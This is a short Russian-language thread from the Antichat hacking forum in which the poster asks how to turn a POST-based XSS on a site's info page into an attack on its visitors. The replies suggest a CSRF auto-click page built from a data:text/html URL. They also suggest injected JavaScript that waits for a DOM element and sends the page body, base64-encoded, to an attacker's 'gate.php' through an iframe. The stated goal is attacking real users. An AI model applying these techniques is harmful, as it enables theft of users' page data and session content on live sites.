Форум АНТИЧАТ - XSS в выводе информации с Ajax

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - XSS в выводе информации с Ajax (https://forum.antichat.xyz/showthread.php?t=451695)

Имеется форма запроса по адресу - domen.com/info/

При нажатии на кнопку, идет POST запрос domen.com/ajax?action=getInfo

На domen.com/info/ выводится полученная информация из запроса, в той же странице.

При отправке JS в POST запросе, код успешно внедряется в domen.com/info/

Токенов нету.

Задача:Реализовать XSS атаку на пользователя находящегося на domen.com/info/

Проблема:Не разберусь как отправить POST запрос, чтобы он вывелся в рамках той же страницы.

Это возможно?

Код:

Code:

data:text/html, document.getElementById('a').click()

Это в браузер, т.е. задействуя csrf это можно сделать.

Похоже на Self-XSS.

Цитата:

Сообщение от None

При отправке JS в POST запросе, код успешно внедряется в domen.com/info/

попробуйте внедрить свой .js код на страницу domen.com/info

а в нем как вариант через setInterval(цикл) чекать вхождение DOM элемента (который появляется только при post запросе), появился - пакуем DOM тело страницы и шлем. Под понятием шлем - iframe src="gate.php?data=base64encode_dom_body"